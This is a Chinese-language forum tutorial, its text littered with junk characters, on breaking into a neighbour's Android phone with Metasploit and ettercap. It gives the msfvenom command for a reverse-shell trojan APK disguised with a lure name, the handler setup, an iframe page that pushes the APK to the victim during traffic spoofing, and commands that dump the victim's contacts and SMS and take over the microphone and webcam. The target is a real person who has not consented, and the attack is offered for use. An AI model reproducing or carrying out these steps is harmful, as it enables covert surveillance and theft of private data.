|
/ [! ~8 P. @) f+ j( n+ C: s# } 五、msf+ettercap入侵邻居安卓手机
: W& d7 d8 I* ?/ l& I' o: {8 E0 C% l / j& ]0 ], i' h
/ {0 Y. U) B8 d3 q5 U 首先启动msf ; x8 G' w5 V4 A' }. Q/ g
( D/ a: C! V# L5 r; p1 A$ o% `# _: X/ K; F) p" J$ b
先用kali生成一个安卓木马,如下命令: + V% H) H: s' Y
1 a' I1 {3 o; Q* s
2 [" M' j8 t- _1 y- B- p, P
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
* z: F/ x# j1 N- b0 ?5 D/ b) m) n
. b% A6 u5 u3 p; \# D/ Z- {7 |* W$ F# e& O8 D) g& v4 R: \; @! k1 }& R
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
% v2 I1 d1 Y1 R' h: D* j/ L8 B( q
! T c8 O$ X5 H1 J/ }) M! {8 R+ K( q( C7 M& k
然后进入msf
7 L" s7 C. V" n 4 _& N* H w) S# V# o
! Z* q# c2 K3 E7 I use exploit/multi/handler + R/ G) R3 o/ A _( ^
2 i, }- i- K$ b4 e t, r c( s) k$ p
" X6 B$ P4 s9 Z5 D9 {: V
set payload android/meterpreter/reverse_tcp
4 P5 `3 J* t* ?4 Y$ w
* w* g1 N! _# Y# h/ d7 E. v$ D% B2 Y' A! I+ B2 ^3 z
set LHOST 192.168.0.109 //ip为kaili的ip
4 ?& M& p' V# m( I, N2 |2 |/ r 5 q! X5 {8 Y, H: y# w- J
, e" \0 n% ?) @5 T
set LPORT 44444 //端口一定要与前面生成的木马的端口一致
2 @7 l8 E) g% q/ {, d
6 p5 U0 P; o$ o1 x8 {* C: _+ i% q- ?
* ~* v9 r6 I4 ~3 {3 D Exploit $ o0 K% \! u' {
1 W q* e5 l2 s* |. g, H
% M; a% P! y# N- k* @ " M/ |$ \" P+ b$ t% D: f
5 {7 u! u+ o# `+ m: Y
2 T! A/ g; |8 x7 i
下面我们开启ettercap -G
1 P& b9 e/ s5 E" d+ {* X3 U. |/ P : f/ Y7 n. g1 W
: ?. p* Y& ]2 M7 I" H 我物理IP为
+ {6 B+ B* \5 U5 y/ x) b( A' Q! v
5 h9 R0 }" g3 g8 g+ W6 a% }# J$ _5 m& a# u9 H0 w4 K
0 e- } w2 B4 F, y/ {& z0 U8 `# t
' @+ T7 J1 j1 V% [
3 @& q. i5 Y0 n% k/ [+ j# A0 } 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
4 I, b' |' _6 c1 Z9 v" q% ~3 t + E& p2 b+ J" S' c) [
% l& }( F7 ?8 ?# |( A
下面我们来设置一下 4 P; t4 F" u: A) d- Q8 @; v* A
; X" {/ r7 d/ p3 ~+ q2 A+ D- a
; R& {, \. y" A7 o9 R5 T3 w# F # _& m( e2 q& d U G* ~6 a
1 K7 M# r$ J3 ]5 k. x% O
+ Q) R7 o! R" I. l0 n% S! D0 w% B
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
; r. W8 f0 [# v) `' G+ L - o# i- ]# a& S7 K; z. S) R8 }
+ Q/ t$ ?% S( j) N
/ a/ C/ g; g1 h5 \. g1 v9 w A9 C4 l 9 F! e" x; K$ F8 T0 c
, u& q' [' I5 d1 n" t+ l: ~. w9 ]- ~) ]
& A/ y+ `' U4 J
% s( m4 h$ D5 @0 x
) o- z, p, }% R+ b: G/ `. g " V8 c3 s5 _* |
" _7 {9 F+ {# G# T2 Y
6 n( K8 {- D {6 K. R0 g& W7 O
0 J' L: ^7 y! ^$ B. ]3 O
T- G4 ~' A" j+ o
8 w O- v& s; d: `; \ . t1 b8 u; F8 W8 t# B. R2 G/ m
6 R! L9 F9 x$ K* s: H
' k% ]1 Y' L" c1 |- M
; h( I) R, G" J# D" v+ h
& u; G, U& X9 `
0 w% T0 n/ d3 T4 t1 G- l8 c
2 I6 z# p) O) S" C' D- ~5 E
7 b' m& x0 J! {+ D, q+ B' g! }- E# [2 G) F0 ^
: {' F6 H! W; @+ w3 v `# \
. S* P* [2 {1 K9 e, H2 j+ u( a
5 O ~, r$ D+ A0 x
! m" f5 w( c4 T3 Q- m $ x+ d5 j( m G' ?1 J" _
4 d& Z4 ^- w$ d/ c7 z
7 D/ F9 K+ f. i$ t4 N: b3 Y* n
6 l [+ }* T" F* X" s4 a6 X6 L+ D& p$ N0 C+ v( ]
8 r1 \, D5 }* }! |5 e, b
% B' v$ s% l$ x' Z( w6 y6 K7 w
" \# N, O5 m- \ {3 o
! b2 B* t. Q, B- B, I7 m
6 Q! m0 w$ x# m$ }, h1 r0 q
3 r% a! G4 O* x! X( Y/ V
8 y1 p$ w; g# ?" V, {- O
# M% @, c& p5 }# G* n Z9 n! N, x8 Z5 s& g1 o& T- `
下面我们开始攻击
! d+ X( }* R }. c1 \ ; A$ y, `( E) n' L+ t* p2 V
% n8 H0 J% J8 i$ V7 K7 c) g/ Q: b
4 { z9 h2 q, O8 `* u! c& `+ C) n . C* t1 L: F0 y0 e& p( m' K
- N- ^1 |* |: w; @& B( p c 8 Z" y6 q5 g% T- L! M, N7 a( k! z
0 p+ t4 S# B ?! k$ F, k
! r w* }( q) ^- ]% b) j9 {% t! i 7 P6 I q" y3 Z- `
3 u: k( C9 ~. I( \, V; v8 K% `, ^7 E. k' e) ]& r9 D7 X9 q& H
/ [$ q0 D) }. P+ c1 q- m7 e0 J% S
( B. q3 a4 k. F
* Q! D( A8 q' x# d8 u
, S4 s0 a2 [+ _% ^4 ~* P1 d + K3 l" E! @- O# C' d
) }$ A7 f/ N! {7 B% ~* h 大概过了5分钟多,发现反弹成功了
, L+ Y0 R0 T1 q% f1 |
% w+ }* n* e8 K% |) R- K, i2 b* z( k; M1 y5 }& E
$ P" r- i, y+ E! Z/ a 1 M( Q) q; S* X. n$ Z& y. f8 z
# W2 Q$ I8 ~3 e) u 7 I, a/ f& j+ k
' j \( h6 U; U
$ W7 f$ W1 \3 f* }/ q+ o! |9 Q
! @2 f# M6 s* u
8 s9 k+ w+ J+ r- k( A9 b
! O' L& A. |6 g W' a
9 a* l' u' q+ F
5 A! z0 B+ B9 O+ y& _, Y0 g2 P$ f) R: j1 ?* t* R# k
$ T7 o( O# j& |) [! M0 u
' L0 j7 m- L9 u1 n7 `: C2 R# u! f6 E0 G2 L& ^7 l: C
0 G3 s q! J4 F4 ~- s8 u ) G, \/ [7 K3 h+ j5 H
% } k% n: x7 f. ^! d6 }
; k3 I1 z* M2 Z; ]2 _5 L ( Q* H7 G- P! I# u
# D0 P, f! R/ F, l
执行命令 0 \3 K/ Y$ f& x; w- @* R" D7 y
: j' Y" J4 M' K' ]3 K3 @
/ u$ P C( n$ h. B, [ 6 D) a% ?/ B3 O$ K( m) Y
6 E* |, _4 X! n4 d7 l
1 \% [8 i! v" @$ s A! B+ k dump_contacts --》这个是导出电话
) _4 \8 n8 b: r+ c
) C+ s7 P. a1 `
0 E0 A% P7 H- t: [! |, A dump_sms --》这个是导出信息
: J# x E! t# D" j , |5 j! d8 m! Y/ K
( d4 d. z) I( m' T& X
record_mic Record audio from the default microphone for X seconds ! G9 N+ B. f" [" O7 i
?4 q) u3 L8 ]7 g
" ~1 B* |! k9 Y( v- { webcam_chat Start a video chat $ c! w. k3 H3 P- t; \0 j
$ U& @$ ~, o/ k) A$ T' V) [. R T6 a2 A: S% E1 h( m q# B' J
webcam_list List webcams : u; i9 l5 k0 i9 F: {% m9 t1 g
6 A+ |, U' D6 `& ]! _# s
) Y* E! H1 B- i' J1 J webcam_snap Take a snapshot from the specified webcam
3 P0 M6 ?5 U9 ~, J4 g* h - y0 B" M8 e# q; U
& h2 z; M$ Y% V) b3 P4 [/ t$ a# T webcam_stream   lay a video stream from the specified webcam * R- {$ `' l$ a, ?
( Y: ~6 K- |; N
8 i4 A; o; l: _7 h' l C8 P/ F: ]) C- W! p
' `0 u" S/ x+ M
! _" S5 ]8 ?4 A# K3 h
$ j; k5 n; K6 `' z- R k
$ f6 p$ u* m* z) b
7 I e ^; t' R9 x( q; Q 我们打开看一下电话薄, ; `& ~, A3 x# @* Q
2 y- j3 P5 ?- f- q$ D! \. v/ y. T' }4 t3 A1 o. ]
8 o. w8 t3 m9 z) f, l) H - U6 ?" @) |" S5 N1 y' n# V
6 U9 E& G8 `6 y: n3 e3 q 7 y+ S4 O6 F, O0 d W/ Q# r' V
" z7 T. ~ H5 H U4 p, R
2 V/ l. E# E3 T7 T0 N% r& v( I
5 m$ U; L; Y' e" F7 h( c; p3 y g- P) U/ B3 I1 `, Y* S) ]0 p( _
a8 r+ {; t! y5 l+ J5 @
; r0 e/ J/ p* F c. t; B0 B4 M$ z 7 N3 p0 }4 [+ \; W4 U. P
$ p+ j) F# V ~/ I4 h; J
9 s4 M$ j) [. H- X
5 H! M4 o! P4 Z9 c5 b" u" V
. m1 r0 [+ w. `! A
4 d8 J4 E/ p% j3 @2 _6 Y( d & a. b* f# J5 G* k: Y$ C: x
9 m2 j! Y# u% ?1 g3 E
我们同时欺骗成DroidJack木马,使用方法如图:
# I7 t* a) M4 e3 E: R1 f3 l. t2 a - g+ `; [ V& g
. ]* }0 `& T5 L7 F! x" T
5 ^% P1 o* s: P- z
w5 }& A8 x8 l* b9 |
4 E. A3 P/ N* B% q% p : z5 o7 T5 n/ U! m8 ?& `
7 P6 Q3 \, I- Q1 l" v" @2 V# x/ T3 |) `5 ?! }
0 z6 @9 ?# A C7 m. \4 ]6 D! H
* d9 G" i! t- i
2 R y: e q5 V" h: [+ { 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
5 u' Q+ u ]0 @9 g
7 }6 A0 `( g1 w, i2 x9 D8 c
& D' }9 {( I# \% ~
' ?* F/ q/ F* y/ u % g' r1 A( R2 U
6 |$ X! q# ~, y! f" ~( U
: X6 R2 W: s' g% R/ M 4 x; \- N0 ~5 ^& N- u% a) B$ \
! k! h* [9 `3 m! b# ?4 S. _. g, J 8 q5 ?. h- e8 q# P3 }5 F0 a: z3 Z
5 i* G, F! v# H' {
5 u) G( d9 Y" T$ m" N/ u 
7 U( d1 A* Y' M' d0 J* {
% o& X: v. |5 Q! Z' @% I4 q
7 Y! U9 t- B! s* U& T3 f/ O* [
6 y& d; o/ r" l A |